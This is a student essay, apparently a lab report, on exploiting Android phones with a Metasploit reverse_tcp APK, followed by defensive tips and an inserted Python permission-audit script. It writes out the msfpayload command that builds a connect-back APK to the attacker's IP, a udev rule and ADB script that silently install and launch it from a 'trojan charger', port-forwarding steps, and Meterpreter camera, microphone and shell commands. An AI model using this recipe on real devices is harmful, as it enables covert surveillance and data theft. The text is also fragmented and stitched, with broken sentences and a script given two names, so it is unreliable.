TCP/IP Based Exploits on Android using metasploit
Typology: Essays (high school)
Introduction
Over the last 10 years a revolution in information technology has taken place. Smartphones, devices that combine mobile communication, internet access, GPS tracking, digital cameras, and advanced computing capability into one handheld portable device, are owned by the majority of Americans and are an everyday tool used for everything from conducting financial transactions to playing video games. As with each new technology that proliferates, the rapid expansion of its use makes it a high-value target for those seeking to find ways to exploit it for nefarious gains.
In 2008 Google released an open source, Linux kernel based smartphone platform called Android. The open nature of the platform made it ideal for device manufacturers such as Samsung and LG. Today Android powered smartphones make up the majority of mobile devices, and Android can be found on products ranging from tablets to the dashboard head unit of cars (Kerr, 2013). However, the open nature of the platform also creates a number of vulnerabilities that can be exploited in order to extract information from, or gain control of, the device.
In order for customers and clients to make reasoned decisions based on risk management factors it is essential to discover and catalog known and possible exploits that can be used to compromise the confidentiality of these smartphones. Gaining an understanding of how these exploits work provides programmers and security managers a starting point for finding and developing solutions for mitigating them. Furthermore, in the hands of proper authorities, the ability to compromise the confidentiality of a device can be necessary in order to audit users or conduct investigations.
Without physical access to the device an attacker requires a remote access point, such as over a network. The connection to a network, such as the internet, that is a primary feature of smartphones is ideal for making this kind of connection, and over the course of this project we intend to explore ways in which the Internet Protocol Suite can be used to the advantage of someone seeking to gain access to an Android powered device. We will be examining how the distribution of malicious APKs (Android Application Packages), which contain code that produces an insecure TCP connection from the victim to the attacker over a network, can provide the attacker with access to a device. With this information we can then assess the vulnerability of various Android devices to compromise.
Background
Just as is the case with PCs, modern smartphones are vulnerable to the threat of malware. While malware targeting smartphones has principally focused on spyware and collecting information about users, in recent years there has been an increase in the proliferation of malware which creates rootkits and provides remote shell access to an attacker (Castillo, 2011). Because Android is based on the Linux kernel, it is possible to port Linux based vulnerabilities onto Android devices. These types of exploits, which for years have been used to compromise Linux based systems, allow for privilege escalation or bypass, potentially exposing the massive amounts of user data contained on a smartphone to access over the internet in real time through a remote shell (Symantec, 2013).
From spyware to phishing attacks, the evolution of malware for Android has made huge leaps in the past couple of years. Android malware has become more sophisticated; in 2010 a study found the first SMS Trojan for Android. Commonly known as “FakePlayer,” the malicious application appears to be a media player application with a fake Microsoft Windows Media Player icon and the title “Movie Player” above that image; it sends SMS messages to premium-rated services without the owner’s knowledge. The result for the owner is a large bill for SMS messages. These exploits are cloaked as regular everyday applications, so many users will install them without any hesitation. Google has since removed the application from the marketplace (Castillo, 2011). Android prides itself on
popularity over the last few years. Applications downloaded from the Amazon App store can today be found on 33% of Android devices, and China’s HiAPK sees close to 300 million downloads per month (onepf.org, n.d.). This is significant, as in order to download these apps users are required to change their device’s security settings to allow the installation of apps from unknown sources, opening up a potential security risk.
One of the most startling exploits that can be found in Android targeted malware is the reverse TCP exploit. This is a reverse connection that bypasses firewall restrictions using the Transmission Control Protocol (TCP). A firewall blocks inbound connections to its ports, but it typically does not block outgoing traffic. A TCP 3-way handshake happens when a client connects to a server via an open port, but in a reverse connection the client opens the port and the server connects to it in order to bypass security restrictions. It is like having a backdoor within the firewall that establishes a connection by opening an outbound connection, allowing you to send commands through the backdoor (Bechtsoudis, 2012). Malware which utilizes a reverse TCP connection, if installed on a device, will open a connection from a victim’s device to the workstation of an attacker. Once this connection is established the attacker can interface with the victim’s device, pulling data, executing commands on the device, or downloading information.
Lab Design, Methodology, and Results
Lab Design
In order to test the vulnerability of Android powered smartphones to being exploited by an attacker using TCP exploits over the internet we will be creating a controlled environment which will consist of a wireless router with access to the internet, a desktop 'attack' station, a diverse collection of Android powered devices with internet access, and a trojan phone charger. The APK used in these tests will be a generic one provided by Metasploit which contains the Meterpreter reverse_tcp payload for Android.
Metasploit is a penetration testing software that uncovers security holes in a network; it allows a person to attack an immediate network in order to discover these holes (Kirsch, 2014). Someone may use Metasploit to prepare for similar attacks that may be launched by hackers, while being able to assess the network and its structure; it may also be used for one’s own research on exploiting devices through the internet. Meterpreter is a payload that uses in-memory DLL injection stagers to run over a network in real time. It works when the user of the target device, in our case the Android phones and tablets, executes the initial stager. The stager performs all the necessary injection and loading of the DLL, and then Meterpreter initializes and sends a GET. The host Metasploit client receives this GET and then has access to the device (Offensive Security, 2014).
The router will be used by the ‘attacker’s’ workstation, while the Android devices being penetrated will be connected to the internet either over a separate WiFi network or, in the case of the HTC One, over a cellular data network. The APK containing the exploit will be pushed both through the Android Debug Bridge (ADB) using a trojan charger and online by downloading it. Once the malicious APK is distributed to the device, the ‘attacker’s’ workstation will be used to open an interface with the device through the Meterpreter handler. With this remote shell on the device established, the ‘attacker’ will attempt to take control of certain device features such as the device’s camera and pull information off the device including, but not limited to, SMS, call records, contact lists, and the device camera.
Equipment required:
1 Cisco-Linksys WRT120N Wireless-N Home Router w/ internet access
1 Desktop workstation
When the exploit on the device connects to the attacker's workstation the handler will open a session between the payload on the device and the handler on the attacker’s workstation, providing a command line interface from which the attacker can send commands to the device.
Prepare Port Forwarding
While this step is not necessary if the attacker and victim are both on the same network, in most cases it will be necessary, as the attacker and target device will need to communicate over a network such as the internet. Port forwarding allows the attacker to exploit the reverse_tcp shell from anywhere in the world, and more importantly does not require the victim's device to be online with a WiFi network, since smartphones are typically connected to cellular data networks at all times.
In the case where the attacker is behind a router or using a VPN (which would be recommended for increased anonymity) the attacker will have a public and a private IP address. The public IP address is the one being used over the internet, as seen here:
The private IP address relates to the machine the attacker is using; it can be determined by entering the command ‘ifconfig’ on the Kali Linux workstation, as seen here:
If the victim attempts to connect to the attacker's private IP address, the connection will fail, because that address is only used behind the router. It is therefore necessary for the attacker to enable port forwarding. The exploit itself will contain the public IP address, as that is the IP address the victim’s machine will need to connect to. The attacker will then set their router to forward any connection to a certain port on the router, which is reached using the public IP address, to the attacker's workstation at its private IP address. In this example the attacker is accessing his router’s settings and forwarding connections to ports 443 and 444 to the IP address of his workstation.
Now when the victim sends packets to the public IP address on port 443, those packets will be forwarded to the attacker's workstation on 24.0.211.254 on port 443. The reason for choosing port 443 is that it is a commonly used port, for Secure HTTP (HTTPS). If the victim is behind a firewall it may drop packets going out of or to certain ports that are not approved for the transmission of packets.
Creating the exploit
The exploit can be compiled from source or built using Metasploit’s msfpayload function. Using Kali Linux and a generic reverse_tcp exploit provided with the Metasploit framework, the APK is created by configuring msfpayload with the Android reverse_tcp payload, as well as the IP address and the port we want the victim to connect to.
To create the malicious APK using the payload from Meterpreter one can use the following command in Kali Linux:
$ msfpayload android/meterpreter/reverse_tcp LHOST=24.0.211.254 LPORT=443 R > exploit.apk
This command will add the following code to the payload class of the APK, which is our reverse_tcp exploit:
making the icon appear as a program the user normally has on their phone would be an example of a change one can make.
Prepare Trojan Charger
An A10-OLinuXino-LIME with an A10 Cortex-A8 processor is running Debian wheezy from an SD card. The operating system on this board contains an Android Debug Bridge (ADB), a copy of an Android Package containing a reverse_tcp exploit (exploit.apk), and a shell script which installs and executes the APK. A rule is created in the /etc/udev/rules.d/51-android.rules file that will automate the distribution and execution of the exploit:
ACTION=="add", SUBSYSTEM=="usb_device", RUN+="/bin/APK_Pusher.sh"
This will cause the execution of APK_Pusher.sh whenever a device is connected. APK_Pusher.sh uses ADB to push the exploit to the device, install it, and execute it. The File ADB_Pusher.sh is as follows:
ADB_Pusher.sh:
#! /bin/sh
cd ~/
sudo adb devices
sudo adb install exploit.apk
adb shell "am start -n com.metasploit.stage/com.metasploit.stage.MainActivity"
Preparing the Victim
Four of our five Android devices were connected to a public WiFi network. These devices were the Motorola Droid Maxx, LG Optimus V, Google Nexus 7 Tablet, and Virgin Mobile PCD Chaser. Our fifth device, the HTC One, was not connected to a WiFi network, but instead connected only to its cellular data network. All five devices had USB debugging enabled. This is essential for testing the Trojan charger, as the APK cannot be installed over USB without USB debugging enabled. Additionally, all devices had the installation of APKs from unknown sources disabled in their security settings.
Pushing the APK
By Trojan Charger
Each phone was connected to the Trojan charger individually. On three of the five devices, upon connection with the A10-OLinuXino-LIME board’s USB port, the shell script was executed without issue, installing exploit.apk and executing its payload. This occurred without any prompt or notification to the user that this was happening. These devices were the Virgin Mobile PCD Chaser, Motorola Droid Maxx, and LG Optimus V.
The HTC One and Nexus 7 tablet would both prompt the user, asking whether they would allow USB debugging. This is due to the devices running a version of Android that contains enhanced security on USB debugging. This enhanced security was introduced with Android 4.2.2 and requires the user to verify whether the device will accept a connection over the debug bridge (Ruddock, 2013).
If the user pressed “OK”, the APK would be pushed, installed, and executed with no further prompt or warning to the user. With exploit.apk installed and the payload running, the device would then begin initiating a TCP connection over the internet to the IP address 24.0.211.254 [the attacker’s public IP address] on port 443.
By Download
Once installed, it is still necessary for the user to execute the application, as it cannot be launched remotely. This simply involves having the user click on the icon for the app.
Once the icon is pressed the exploit will launch, initiating a TCP connection with our attacker’s workstation at IP address 24.0.211.254 on port 443.
Exploiting the Reverse TCP Connection
While exploit.apk was being pushed and installed, the attacker’s workstation was running the Metasploit framework with the exploit handler, which was previously configured and launched, waiting for a connection. Once the exploit on the device connects to the handler on the attacker’s workstation, an interface session will be opened by the handler, allowing the attacker to send commands to the device over the TCP connection. In all cases, regardless of device, OS, or access point, the exploit successfully established a reverse TCP shell between the attacker’s workstation and the device.
Overview of Meterpreter commands
There are six core groups of commands that can be executed over this connection. They are Android commands, webcam commands, system commands, networking commands, file system commands, and core commands. Some of these commands are demonstrated below.
upload – This is a file system command that allows the attacker to upload a file from the attacker system to the victim’s device. This can be used to upload an exploit, such as GingerBreak, which can be used to gain root access to the device’s file system.
shell – This is a system command that allows the attacker to access the command shell of the device. While in this shell the attacker can run standard Android/Linux commands on the device, edit or delete files, or explore the device’s file system.
Webcam_Snap – This is a webcam command that activates the device’s built in camera, takes a photo, and downloads that photo to the attacker’s workstation. Other webcam commands include webcam_stream, which provides a continuous video stream from the device’s camera to the attacker’s workstation and record_mic, which turns on the device’s microphone and records audio for a specified period of time.
your device, there are other steps that can be taken to better protect yourself from encountering mobile malware. Precautions include:
Legitimate app stores
When downloading apps it's imperative that you only do so from a legitimate app store, such as the Google Play Store. By only using the Google Play Store a user can keep the security restriction on installing unknown apps in place. This marketplace is monitored and scanned for potentially dangerous or fraudulent programs. On occasion malicious apps still slip through the cracks, often disguised as legitimate ones. Even so, it provides a higher level of security against malicious APKs.
Suspicious apps
One of the best defenses against malware is to notice things like suspicious apps with outrageous promises, bad reviews, and sketchy app permissions. If possible, examine the source code by unpacking the APK on a computer and opening the files in a text editor. Also important is to pay attention to the information provided by the AndroidManifest.xml file, which lists the permissions you would be giving the application.
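As an added example, not part of the original essay, the script below reads the decoded AndroidManifest.xml of an unpacked APK and flags the permissions that map onto the capabilities described above (camera, microphone, SMS, call records, contacts, file upload) together with the network access a connect-back payload needs. The two sample manifests, package names and labels are constructed for illustration.

```python
"""Audit the permissions declared in an AndroidManifest.xml against the
capabilities the essay's reverse_tcp payload exercises, plus the network
access a connect-back shell needs. Sample manifests are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS  # ElementTree form of android:name

# Permission -> the Meterpreter capability from the essay that it enables.
RISKY_PERMISSIONS = {
    "android.permission.CAMERA": "camera (webcam_snap, webcam_stream)",
    "android.permission.RECORD_AUDIO": "microphone (record_mic)",
    "android.permission.READ_SMS": "read SMS",
    "android.permission.SEND_SMS": "send SMS (premium-rate abuse, as in FakePlayer)",
    "android.permission.READ_CALL_LOG": "call records",
    "android.permission.READ_CONTACTS": "contact list",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write files (upload)",
}
NETWORK_PERMISSION = "android.permission.INTERNET"

def requested_permissions(manifest_xml):
    """Return the android:name of every <uses-permission> element, in order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("uses-permission")
            if el.get(NAME_ATTR)]

def audit_manifest(manifest_xml):
    """Summarise risky permissions and whether they pair with network access."""
    # A "media player" that wants camera, mic, SMS and the network at once is
    # the mismatch between stated purpose and permissions to look for.
    perms = requested_permissions(manifest_xml)
    risky = {p: RISKY_PERMISSIONS[p] for p in perms if p in RISKY_PERMISSIONS}
    has_network = NETWORK_PERMISSION in perms
    return {
        "package": ET.fromstring(manifest_xml).get("package"),
        "permissions": perms,
        "risky": risky,
        "network": has_network,
        "exfiltration_capable": has_network and bool(risky),
    }

# Constructed sample: a "Movie Player" asking for far more than playback needs.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.movieplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Movie Player"/>
</manifest>"""

# Constructed sample: a player that only streams media over the network.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.streamplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Stream Player"/></manifest>"""
```

Run audit_manifest() on the manifest produced by your APK unpacking tool; a non-empty "risky" map combined with "network" set to True is the combination worth questioning before installing.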
Settings
Google includes numerous settings in the Android operating system that can prevent malicious attacks. Devices running Android 2.2 or higher, which essentially means nearly all Android devices, have access to Google's malware scanner. Prior to installing an application you downloaded outside of the Play Store, Google will scan the app and warn you of any potential threats.
This feature is enabled by default and can be accessed in the Google Settings app in your device's app drawer. Alternatively, devices running Android 4.2 or higher can access the feature by going to Settings, clicking on Security, and scrolling down to Verify apps.
Antivirus apps
The Google Play store is also home to hundreds of antivirus apps that can offer an extra layer of protection. Finding the right one, however, can sometimes be difficult. A simple "antivirus" search in the store yields more than 250 results. Companies like Avast, AVG, BitDefender, Kaspersky, Sophos, Symantec (Norton), and TrendMicro have long and established histories as some of the most trusted brands in the industry.
The live demo proves that this type of exploit is very effective in getting access to a user’s device. It shows the vulnerability in Android’s native OS regardless of build, software, or settings. The exploit has the ability to provide an attacker access to personal and sensitive information on a device, including the ability to get root access by pushing an exploit and accessing the device’s shell. Due to the nature of reverse TCP exploits, the utmost strict security precautions should be taken. The only sure way to prevent yourself from being the victim of a reverse_tcp exploit, while maintaining a reasonable amount of functionality for your device, is to ensure you do not have one installed on your device.
References